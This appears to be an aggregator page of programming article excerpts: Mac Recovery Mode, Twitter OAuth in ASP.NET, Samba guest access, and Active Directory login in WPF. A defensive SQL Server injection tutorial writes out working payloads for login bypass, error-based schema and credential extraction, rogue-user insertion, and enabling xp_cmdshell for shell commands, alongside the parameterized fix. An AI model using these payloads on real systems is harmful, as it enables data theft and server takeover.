    A Mac’s Recovery Mode is for more than just reinstalling Mac OS X. You’ll find many other useful troubleshooting utilities here — you can use these even if your Mac can’t boot normally. To access Recovery Mode, restart your Mac and press and hold the Command + R keys during the boot-up process. This is one of several hidden startup options on a Mac. Reinstall Mac OS X Most people know Recovery Mode as the place you go to reinstall OS X on your Mac. Recovery Mode will download the OS X installer files from teh Intenret if you don’t have them locally, so they don’t take up space on your disk and you’ll never have to hunt for an opearign system disc. Better yet, it will download up-to-date installation files so you don’t have to spend hours installing operating system updates later. Microsoft could learn a lot from Apple here. Restore From a Time Machine Backup Instead of reinstalling OS X, you can choose to restore your Mac from a time machine backup. This is like restoring a system image on another operating system. You’ll need an external disk containing a backup image created on the current computer to do this. Browse the Web The Get Help Online link opens the Safari web browser to Apple’s documentation site. It’s not limited to Apple’s website, though — you can navigate to any website you like. This feature allows you to access and use a browser on your Mac even if it isn’t booting properly. It’s ideal for looking up troubleshooting information. Manage Your Disks The Disk Utility option opens the same Disk Utility you can access from within Mac OS X. It allows you to partition disks, format them, scan disks for problems, wipe drives, and set up drives in a RAID configuration. If you need to edit partitions from outside your operating system, you can just boot into the recovery environment — you don’t have to download a special partitioning tool and boot into it. Choose the Default Startup Disk Click the Apple menu on the bar at the top of your screen and select Startup Disk to access the Choose Startup Disk tool. Use this tool to choose your computer’s default startup disk and reboot into another operating system. For example, it’s useful if you have Windows installed alongside Mac OS X with Boot Camp. Add or Remove an EFI Firmware Password You can also add a firmware password to your Mac. This works like a BIOS password or UEFI password on a Windows or Linux PC. Click the Utilities menu on the bar at the top of your screen and select Firmware Password Utility to open this tool. Use the tool to turn on a firmware password, which will prevent your computer from starting up from a different hard disk, CD, DVD, or USB drive without the password you provide. This prevents people form booting up your Mac with an unauthorized operating system. If you’ve already enabled a firmware password, you can remove it from here. Use Network Tools to Troubleshoot Your Connection Select Utilities > Network Utility to open a network diagnostic tool. This utility provides a graphical way to view your network connection information. You can also use the netstat, ping, lookup, traceroute, whois, finger, and port scan utilities from here. These can be helpful to troubleshoot Internet connection problems. For example, the ping command can demonstrate whether you can communicate with a remote host and show you if you’re experiencing packet loss, while the traceroute command can show you where a connection is failing if you can’t connect to a remote server. Open a Terminal If you’d like to get your hands dirty, you can select Utilities > Terminal to open a terminal from here. This terminal allows you to do more advanced troubleshooting. Mac OS X uses the bash shell, just as typical Linux distributions do. Most people will just need to use the Reinstall Mac OS X option here, but there are many other tools you can benefit from. If the Recovery Mode files on your Mac are damaged or unavailable, your Mac will automatically download them from Apple so you can use the full recovery environment.

    Read the article

  • Integrating Twitter Into An ASP.NET Website Using OAuth

    Earlier this year I wrote an article about Twitterizer, an open-source .NET library that can be used to integrate your application with Twitter. Using Twitterizer you can allow your visitors to post tweets, view their timeline, and much more, all without leaving your website. The original article, Integrating Twitter Into An ASP.NET Website, showed how to post tweets and view a timeline to a particular Twitter account using Twitterizer 1.0. To post a tweet to a specific account, Twitterizer 1.0 uses basic authentication. Basic authentication is a very simple authentication scheme. For an application to post a tweet to JohnDoe's Twitter account, it would submit JohnDoe's username and password (along with the tweet text) to Twitter's servers. Basic authentication, while easy to implement, is not an ideal authentication scheme as it requires that the integrating application know the username(s) and password(s) of the accounts that it is connected to. Consequently, a user must share her password in order to connect her Twitter account with the application. Such password sharing is not only insecure, but it can also cause difficulties down the line if the user changes her password or decides that she no longer wants to connect her account to certain applications (but wants to remain connected to others). To remedy these issues, Twitter introduced support for OAuth, which is a simple, secure protocol for granting API access. In a nutshell, OAuth allows a user to connect an application to their Twitter account without having to share their password. Instead, the user is sent to Twitter's website where they confirm whether they want to connect to the application. Upon confirmation, Twitter generates an token that is then sent back to the application. The application then submits this token when integrating with the user's account. The token serves as proof that the user has allowed this application access to their account. (Twitter users can view what application's they're connected to and may revoke these tokens on an application-by-application basis.) In late 2009, Twitter announced that it was ending its support for basic authentication in June 2010. As a result, the code examined in Integrating Twitter Into An ASP.NET Website, which uses basic authentication, will no longer work once the cut off date is reached. The good news is that the Twitterizer version 2.0 supports OAuth. This article examines how to use Twitterizer 2.0 and OAuth from a website. Specifically, we'll see how to retrieve and display a user's latest tweets and how to post a tweet from an ASP.NET page. Read on to learn more! Read More >Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

    Read the article

  • Integrating Twitter Into An ASP.NET Website Using OAuth

    Earlier this year I wrote an article about Twitterizer, an open-source .NET library that can be used to integrate your application with Twitter. Using Twitterizer you can allow your visitors to post tweets, view their timeline, and much more, all without leaving your website. The original article, Integrating Twitter Into An ASP.NET Website, showed how to post tweets and view a timeline to a particular Twitter account using Twitterizer 1.0. To post a tweet to a specific account, Twitterizer 1.0 uses basic authentication. Basic authentication is a very simple authentication scheme. For an application to post a tweet to JohnDoe's Twitter account, it would submit JohnDoe's username and password (along with the tweet text) to Twitter's servers. Basic authentication, while easy to implement, is not an ideal authentication scheme as it requires that the integrating application know the username(s) and password(s) of the accounts that it is connected to. Consequently, a user must share her password in order to connect her Twitter account with the application. Such password sharing is not only insecure, but it can also cause difficulties down the line if the user changes her password or decides that she no longer wants to connect her account to certain applications (but wants to remain connected to others). To remedy these issues, Twitter introduced support for OAuth, which is a simple, secure protocol for granting API access. In a nutshell, OAuth allows a user to connect an application to their Twitter account without having to share their password. Instead, the user is sent to Twitter's website where they confirm whether they want to connect to the application. Upon confirmation, Twitter generates an token that is then sent back to the application. The application then submits this token when integrating with the user's account. The token serves as proof that the user has allowed this application access to their account. (Twitter users can view what application's they're connected to and may revoke these tokens on an application-by-application basis.) In late 2009, Twitter announced that it was ending its support for basic authentication in June 2010. As a result, the code examined in Integrating Twitter Into An ASP.NET Website, which uses basic authentication, will no longer work once the cut off date is reached. The good news is that the Twitterizer version 2.0 supports OAuth. This article examines how to use Twitterizer 2.0 and OAuth from a website. Specifically, we'll see how to retrieve and display a user's latest tweets and how to post a tweet from an ASP.NET page. Read on to learn more! Read More >

    Read the article

  • What does NT_STATUS_BAD_NETWORK_NAME mean in Samba?

    - by Neil
    I set up a share like this: [global] security = user map to guest = Bad Password usershare allow guests = yes [vms] comment = VirtualBox Virtual Machines path = /home/neil/VirtualBox/HardDisks guest ok = yes read only = yes And when I access the share as myself, and type in my password, it works fine: $ smbclient //neil-ubuntu/vms -U neil Enter neil's password: Domain=[SHUTTERSTOCK] OS=[Unix] Server=[Samba 3.4.0] smb: \> But when I access it as guest, it doesn't work: $ smbclient //neil-ubuntu/vms -U guest Enter guest's password: Domain=[SHUTTERSTOCK] OS=[Unix] Server=[Samba 3.4.0] tree connect failed: NT_STATUS_BAD_NETWORK_NAME Regardless of what password I type in. Does anyone know why? Also, why does smbclient print such useless error messages?

    Read the article

  • WPF Login Verification Using Active Directory

    - by psheriff
    Back in October of 2009 I created a WPF login screen (Figure 1) that just showed how to create the layout for a login screen. That one sample is probably the most downloaded sample we have. So in this blog post, I thought I would update that screen and also hook it up to show how to authenticate your user against Active Directory. Figure 1: Original WPF Login Screen I have updated not only the code behind for this login screen, but also the look and feel as shown in Figure 2. Figure 2: An Updated WPF Login Screen The UI To create the UI for this login screen you can refer to my October of 2009 blog post to see how to create the borderless window. You can then look at the sample code to see how I created the linear gradient brush for the background. There are just a few differences in this screen compared to the old version. First, I changed the key image and instead of using words for the Cancel and Login buttons, I used some icons. Secondly I added a text box to hold the Domain name that you wish to authenticate against. This text box is automatically filled in if you are connected to a network. In the Window_Loaded event procedure of the winLogin window you can retrieve the user’s domain name from the Environment.UserDomainName property. For example: txtDomain.Text = Environment.UserDomainName The ADHelper Class Instead of coding the call to authenticate the user directly in the login screen I created an ADHelper class. This will make it easier if you want to add additional AD calls in the future. The ADHelper class contains just one method at this time called AuthenticateUser. This method authenticates a user name and password against the specified domain. The login screen will gather the credentials from the user such as their user name and password, and also the domain name to authenticate against. To use this ADHelper class you will need to add a reference to the System.DirectoryServices.dll in .NET. The AuthenticateUser Method In order to authenticate a user against your Active Directory you will need to supply a valid LDAP path string to the constructor of the DirectoryEntry class. The LDAP path string will be in the format LDAP://DomainName. You will also pass in the user name and password to the constructor of the DirectoryEntry class as well. With a DirectoryEntry object populated with this LDAP path string, the user name and password you will now pass this object to the constructor of a DirectorySearcher object. You then perform the FindOne method on the DirectorySearcher object. If the DirectorySearcher object returns a SearchResult then the credentials supplied are valid. If the credentials are not valid on the Active Directory then an exception is thrown. C#public bool AuthenticateUser(string domainName, string userName,  string password){  bool ret = false;   try  {    DirectoryEntry de = new DirectoryEntry("LDAP://" + domainName,                                           userName, password);    DirectorySearcher dsearch = new DirectorySearcher(de);    SearchResult results = null;     results = dsearch.FindOne();     ret = true;  }  catch  {    ret = false;  }   return ret;} Visual Basic Public Function AuthenticateUser(ByVal domainName As String, _ ByVal userName As String, ByVal password As String) As Boolean  Dim ret As Boolean = False   Try    Dim de As New DirectoryEntry("LDAP://" & domainName, _                                 userName, password)    Dim dsearch As New DirectorySearcher(de)    Dim results As SearchResult = Nothing     results = dsearch.FindOne()     ret = True  Catch    ret = False  End Try   Return retEnd Function In the Click event procedure under the Login button you will find the following code that will validate the credentials that the user types into the login window. C#private void btnLogin_Click(object sender, RoutedEventArgs e){  ADHelper ad = new ADHelper();   if(ad.AuthenticateUser(txtDomain.Text,         txtUserName.Text, txtPassword.Password))    DialogResult = true;  else    MessageBox.Show("Unable to Authenticate Using the                      Supplied Credentials");} Visual BasicPrivate Sub btnLogin_Click(ByVal sender As Object, _ ByVal e As RoutedEventArgs)  Dim ad As New ADHelper()   If ad.AuthenticateUser(txtDomain.Text, txtUserName.Text, _                         txtPassword.Password) Then    DialogResult = True  Else    MessageBox.Show("Unable to Authenticate Using the                      Supplied Credentials")  End IfEnd Sub Displaying the Login Screen At some point when your application launches, you will need to display your login screen modally. Below is the code that you would call to display the login form (named winLogin in my sample application). This code is called from the main application form, and thus the owner of the login screen is set to “this”. You then call the ShowDialog method on the login screen to have this form displayed modally. After the user clicks on one of the two buttons you need to check to see what the DialogResult property was set to. The DialogResult property is a nullable type and thus you first need to check to see if the value has been set. C# private void DisplayLoginScreen(){  winLogin win = new winLogin();   win.Owner = this;  win.ShowDialog();  if (win.DialogResult.HasValue && win.DialogResult.Value)    MessageBox.Show("User Logged In");  else    this.Close();} Visual Basic Private Sub DisplayLoginScreen()  Dim win As New winLogin()   win.Owner = Me  win.ShowDialog()  If win.DialogResult.HasValue And win.DialogResult.Value Then    MessageBox.Show("User Logged In")  Else    Me.Close()  End IfEnd Sub Summary Creating a nice looking login screen is fairly simple to do in WPF. Using the Active Directory services from a WPF application should make your desktop programming task easier as you do not need to create your own user authentication system. I hope this article gave you some ideas on how to create a login screen in WPF. NOTE: You can download the complete sample code for this blog entry at my website: http://www.pdsa.com/downloads. Click on Tips & Tricks, then select 'WPF Login Verification Using Active Directory' from the drop down list. Good Luck with your Coding,Paul Sheriff ** SPECIAL OFFER FOR MY BLOG READERS **We frequently offer a FREE gift for readers of my blog. Visit http://www.pdsa.com/Event/Blog for your FREE gift!

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 81 82 83 84 85 86 87 88 89 90 91 92  | Next Page >